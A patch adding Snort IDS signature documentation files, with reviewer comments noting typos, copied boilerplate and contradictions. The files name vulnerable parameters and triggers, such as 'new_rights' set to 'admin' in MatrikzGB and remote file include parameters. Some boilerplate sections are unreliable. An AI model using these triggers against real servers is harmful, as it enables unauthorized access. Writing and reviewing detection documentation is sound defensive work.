--- /dev/null
+++ b/doc/signatures/1405.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1405
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
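Review bot: this document duplicates the 1506 file in this patch verbatim, including the "running ona web server" typo and the missing apostrophe in "attackers choosing"; fix both, and replace the generic CGI text with the script or parameter sid 1405 actually matches so the two sids can be told apart. Additional References is empty.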
--- /dev/null
+++ b/doc/signatures/3181.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3181
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
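Review bot: another verbatim copy of the RPC DCOM text (sids 3303, 3269, 3310); nothing here identifies what sid 3181 covers. The Attack Scenarios paragraph about a long filename over a network share still contradicts the malformed RPC request described in Detailed Information, "Expoit" should be "Exploit", and Additional References is empty.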
--- /dev/null
+++ b/doc/signatures/100000133.txt
@@ -0,0 +1,63 @@
+Rule: 
+
+--
+Sid: 
+100000133
+
+-- 
+Summary: 
+This event is generated when an attempt is made to cause a denial of service 
+against the Xeneo web server by sending it a request with an overly large 
+number of "?" characters.
+
+-- 
+
+Impact: 
+A denial of service will occur, and it may be possible to execute arbitrary 
+code with the privileges of the user running the web server.
+
+--
+Detailed Information:
+The denial of service is triggered when a GET request is made with more than 
+4096 "?" characters. The rule actually looks for 250 consecutive "?" 
+characters, as even that should never occur, and looking for a smaller number 
+increases the rule's performance.
+
+--
+Affected Systems:
+Northern Solutions Xeneo Web Server 2.2.10
+
+--
+
+Attack Scenarios: 
+This vulnerability may be exploited with a web browser or an automated script.
+
+-- 
+
+Ease of Attack: 
+Simple, as a web browser can be used.
+
+-- 
+
+False Positives:
+If a valid request contains more than 250 and less than 4096 consecutive "?" 
+characters, a false positive will be generated.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Currently, no patches or upgrades are available from the vendor, and no 
+workarounds are known.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
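Review bot: the Summary and Detailed Information describe only a denial of service, but Impact adds that "it may be possible to execute arbitrary code"; either drop the code-execution claim or explain in Detailed Information what supports it. The False Positives section says "more than 250 ... consecutive" characters while Detailed Information says the rule looks for 250 consecutive characters, so a request with exactly 250 would also fire; say "250 or more". The threshold explanation here is the kind of detail the other documents lack and is worth keeping. Additional References is empty although the product and version are named, and the Affected Systems entry is not tab-indented like the other files.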
--- /dev/null
+++ b/doc/signatures/1524.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1524
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
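Review bot: identical to the 1077 document earlier in this patch; without the URI or application sid 1524 matches, the document does not help a responder decide what the alert means. The copied "validating the credentials of a client host" paragraph does not relate to the Summary, "attackers choosing" needs an apostrophe, and Additional References is empty.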
--- /dev/null
+++ b/doc/signatures/2331.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2331
+
+--
+Summary:
+This event is generated when an attempt is made to possibly gain
+administrative access to the MatrikzGB Guestbook PHP application running
+on a server.
+
+--
+Impact:
+Possible administrative access to the Guestbook.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the MatrikzGB Guestbook web application running on a server.
+
+It is possible for an attacker to modify the appropriate URI parameter
+in the index.php script to gain administrative rightst to the MatrikzGB
+Guestbook.
+
+--
+Affected Systems:
+	MatrikzGB Guestbook 2.0
+
+--
+Attack Scenarios:
+An attacker can supply "admin" to the "new_rights" parameter in the PHP
+script index.php.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
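Review bot: "administrative rightst" should be "administrative rights". Attack Scenarios names the parameter ("new_rights" set to "admin") while Detailed Information only says "the appropriate URI parameter"; name it in both places so the document is consistent. Corrective Action uses the generic "up to date version ... vendor supplied patches" wording even though Affected Systems pins the version to MatrikzGB Guestbook 2.0; state whether a fixed version exists, and fill the empty Additional References section with the advisory.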
--- /dev/null
+++ b/doc/signatures/100000753.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000753
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Free QBoard" application running on a webserver. Access to the file "delete.php" using a remote file being passed as the "qb_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "qb_path" parameter in the "delete.php" script used by the "Free QBoard" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Free QBoard
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
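Review bot: the Detailed Information mixes the specific remote file include description with two boilerplate CGI paragraphs in the wrong order: the third paragraph ("validating the credentials of a client host") describes a credential-validation weakness, not a remote file include, and the Attack Scenarios ("supply his/her own credentials") likewise does not describe passing a remote URL in "qb_path"; replace both with text that matches the Summary. Also "ona" should be "on a", "attackers choosing" needs an apostrophe, "All systems running CGI applications using Free QBoard" should just name the Free QBoard version(s), and the file has two leading blank lines and no blank line before the "--" separators after Sid, Affected Systems and Contributors, unlike the other documents.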
--- /dev/null
+++ b/doc/signatures/1993.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+1993
+
+--
+Summary:
+This event is generated when a remote attacker sends a LOGIN command
+with a suspiciously long argument to an internal IMAP server, indicating
+an attempt to exploit a buffer overflow vulnerability in Carnegie Mellon
+University Cyrus IMAP Server. This may also affect other IMAP server
+implementations.
+
+--
+Impact:
+Possible remote execution of arbitrary code, leading to remote root compromise.
+
+--
+Detailed Information:
+Carnegie Mellon University Cyrus IMAP Server 2.1.10 and earlier contains
+a buffer overflow vulnerability where a malformed, overly long argument
+to a LOGIN command sent to a vulnerable IMAP server can cause a buffer
+overflow condition. This can allow the attacker to overwrite data in
+memory, leading to the execution of arbitrary code on the server with
+the security privileges of the IMAP server process.    
+
+--
+Affected Systems:
+	CMU Cyrus IMAP Server version 2.1.10 or earlier.
+
+--
+Attack Scenarios:
+An attacker sends a LOGIN command with an overly long, specially crafted
+argument to a vulnerable IMAP server, causing a buffer overflow
+condition. The attacker can then overwrite specific words in memory to
+execute arbitrary code on the server with the security privileges of the
+IMAP server process.
+
+--
+Ease of Attack:
+Simple. A proof of concept exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+--
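Review bot: the Summary says the rule fires on a "suspiciously long argument" but the document never states the length threshold, which is the one figure a responder needs to judge the "None known" False Positives claim; document the length the rule checks (the Xeneo document in this patch does this) and whether a legitimately long LOGIN argument could trigger it. The Summary also says "This may also affect other IMAP server implementations" while Affected Systems lists only CMU Cyrus 2.1.10 or earlier; either list the others or drop the sentence. Additional References is empty even though a specific product version is named, and there is trailing whitespace after "IMAP server process."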
--- /dev/null
+++ b/doc/signatures/1874.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1874
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
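Review bot: Nothing in this file says what SID 1874 actually matches; "exploit a known vulnerability on a web server or a web application resident on a web server" and "Affected Systems: All systems using a web server." could describe any web rule. Name the request pattern (URI or parameter) the rule looks for and the product it targets, and fill the empty "Additional References:" section so an analyst can separate a real hit from a scanner probe. Minor: "attackers choosing" should be "attacker's choosing".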
--- /dev/null
+++ b/doc/signatures/3315.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3315
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
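Review bot: "Attack Scenarios:" says "An attacker may make a request for a file with an overly long filename via a network share.", which contradicts "Detailed Information:", where the trigger is "a malformed request to an RPC port" handled by DCOM; the scenario should describe the malformed RPC request. "Expoit" in "Ease of Attack:" is a typo for "Exploit". "Additional References:" is empty; since "Corrective Action:" tells the reader to apply vendor patches, the Microsoft bulletin and CVE for this RPC DCOM overflow should be cited here.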
--- /dev/null
+++ b/doc/signatures/100000704.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+100000704
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "SmartSiteCMS" application running on a webserver. Access to the file "comment.php" using a remote file being passed as the "root" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "root" parameter in the "comment.php" script used by the "SmartSiteCMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using SmartSiteCMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
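Review bot: The third paragraph of "Detailed Information:" and the whole "Attack Scenarios:" section describe credential-based access ("An attacker can access an authentication mechanism and supply his/her own credentials"), which does not match the remote file include through the "root" parameter of "comment.php" described in "Summary:"; drop the credential boilerplate and describe the remote URL passed in "root" instead. Also "running ona web server" is missing a space, "may indicate that an exploitation attempt has been attempted" is redundant ("may indicate an exploitation attempt"), "attackers choosing" should be "attacker's choosing", and "Affected Systems:" and "Contributors:" lack the blank line before "--" that the rest of the file uses.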
--- /dev/null
+++ b/doc/signatures/100000722.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000722
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PHPRaid" application running on a webserver. Access to the file "lua_output.php" using a remote file being passed as the "phpraid_dir" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpraid_dir" parameter in the "lua_output.php" script used by the "PHPRaid" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPRaid
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
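Review bot: As in the other remote file include files, the third paragraph of "Detailed Information:" and the "Attack Scenarios:" section talk about supplying credentials to an authentication mechanism, which is unrelated to a remote file passed in the "phpraid_dir" parameter of "lua_output.php"; replace them with the RFI scenario the "Summary:" describes. The file also starts with two blank lines before "Rule:", "running ona web server" is missing a space, "an exploitation attempt has been attempted" is redundant, "attackers choosing" should be "attacker's choosing", and "Affected Systems:" and "Contributors:" lack the blank line before "--".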
--- /dev/null
+++ b/doc/signatures/114.txt
@@ -0,0 +1,77 @@
+Rule:
+
+--
+Sid:
+114
+
+--
+Summary:
+This event is generated when the Netbus trojan service is responding to 
+an attackers commands on port 12346
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+--
+Detailed Information:
+The program is a backdoor designed for Windows. It allows anyone who
+knows the listening port number and password to remotely control the 
+host.  Intruders access the server using either a text or graphics based
+client.
+
+The backdoor program allows the remote user to execute commands, list
+files, start silent services, share directories, upload and download
+files, manipulate the registry, kill processes, list processes, as well
+as other options, as well as open/close the CD-ROM drive, send
+interactive dialogs to chat with the compromised system, listen to the
+system's microphone (if it has one), and a few other features. 
+
+--
+Affected Systems:
+	Windows 95
+	Windows 98
+	Windows NT
+	Windows 2000
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise may be due to the exploitation of another vulnerability and
+the attacker is leaving another way into the machine for further use.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+Security tool probing for netbus
+Other services configured for 12346
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Telnet access to port 12346 from external sources.
+
+Use SSH as opposed to Telnet for access from external locations
+
+Delete the Trojan and kill any associated processes.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by John Liss
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+NetBus
+http://www.ntsecurity.net/
+
+--
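Review bot: "Disallow Telnet access to port 12346 from external sources." and "Use SSH as opposed to Telnet for access from external locations" in "Corrective Action:" do not fit this rule: per "Detailed Information:" port 12346 is the NetBus backdoor's listening port, not a Telnet service, so the Telnet/SSH wording looks copied from another file. Keep the port block and "Delete the Trojan and kill any associated processes.", and, since "Attack Scenarios:" says the initial compromise may have come through another vulnerability, add a step to find and close that original entry point. Minor: the "Summary:" sentence has no terminating period and no blank line before "--", "attackers commands" should be "attacker's commands", "None Known" should be "None known." as elsewhere, and "http://www.ntsecurity.net/" is a site root rather than a NetBus reference.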
--- /dev/null
+++ b/doc/signatures/3069.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+3069
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the several commands of an IMAP service. This
+event is concerned with data supplied as a parameter to the
+"fetch" command.
+
+--
+Impact:
+A successful attack may cause a denial of service or a buffer overflow
+and the subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+This event is generated when excess data is detected in an IMAP command.
+Some IMAP implementations exhibit programming errors that can lead to a
+buffer overflow condition when excess data is supplied to a static
+buffer.
+
+A vulnerability exists in the way that the Mercury Mail IMAP service
+handles several commands.  An excessively long command argument can
+trigger a denial of service or a buffer overflow and the subsequent
+execution of arbitrary code on a vulnerable server.
+
+--
+Affected Systems:
+	Pegasus Mail Mercury Mail Transport System 3.32
+	Pegasus Mail Mercury Mail Transport System 4.01a
+
+--
+Attack Scenarios:
+An attacker can supplied an overly long command, causing denial of
+service or a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell<bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
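Review bot: "An attacker can supplied an overly long command" in "Attack Scenarios:" should be "can supply"; "associated with the several commands of an IMAP service" in "Summary:" should drop "the". "Summary:" says this rule covers the "fetch" command but "Detailed Information:" only says the Mercury service mishandles "several commands"; the body should name the commands it means so the reader knows why "fetch" is singled out. "Brian Caswell<bmc@sourcefire.com>" is missing the space before the address, and "Additional References:" is empty although two specific versions ("3.32", "4.01a") are listed under "Affected Systems:"; cite the advisory those versions come from.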
--- /dev/null
+++ b/doc/signatures/2953.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2953
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
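Review bot: "Detailed Information:" does not say which share name or SMB request SID 2953 matches; "use Samba to gain access to private or administrative shares" gives an analyst nothing to triage against, so name the share pattern the rule looks for. "False Positives: None known." is doubtful for a rule on access to administrative shares, since routine administrator sessions produce the same traffic and should be listed. "adminsitrative" in "Attack Scenarios:" is a typo for "administrative", and "Additional References:" is empty.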
--- /dev/null
+++ b/doc/signatures/2636.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+2636
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in many
+useful tasks.  The "offline_snapshot.begin_load" procedure is used for
+offline instantiation of snapshots.  This procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "gname" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck632.html
+
+--
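Review bot: "If you are running Oracle on a Windows server, make sure that the variable $ORACLE_PORTS is set to a value of "any"." is a sensor configuration instruction, not vulnerability detail, and should move out of "Detailed Information:" (into "Corrective Action:" or a dedicated note) with a sentence on why Windows deployments need it. "a Oracle database implementation" in "Summary:" should be "an Oracle database implementation". "Attack Scenarios:" names the "gname" variable while "Detailed Information:" only says "a parameter for the procedure"; the two should agree. "Affected Systems:" is indented with spaces ("        Oracle 9i") where the other files use a tab.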
--- /dev/null
+++ b/doc/signatures/1139.txt
@@ -0,0 +1,60 @@
+Rule:  
+--
+
+Sid:
+1139
+
+--
+
+Summary:
+This event is generated when an attempt is made to evade an IDS in a 
+possible web attack by sending an obfuscated request.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+Some CGI attacks can be accomplished by using HEAD instead of GET.
+Additionally, some web servers will interpret "/./" as simply "/".
+An attacker might try to combine these methods in an attempt to
+obfuscate an attack or during the reconnaissance phase of a penetration
+attempt in order to bypass an IDS.
+
+--
+Affected Systems:
+	All Web Servers.
+ 
+--
+Attack Scenarios:
+An attacker may use an automated tool, like Whisker, to obfuscate an
+attack.
+
+--
+Ease of Attack:
+Simple. Exploit scripts and tools are widely available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Examine the host for signs of compromise.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
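Review bot: The section layout in this file differs from the rest of the set: "Rule:  " carries trailing spaces, "--" comes directly after it with blank lines around "Sid:" and before "Summary:", and the line after "All Web Servers." is a lone space. Align it with the other files. "Original document author unkown" is a typo for "unknown", and "Impact: Unknown." is unhelpful given "Detailed Information:" explains the request is an evasion wrapped around a web attack; say that the impact is that of whichever attack is being obfuscated.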
--- /dev/null
+++ b/doc/signatures/843.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+843
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
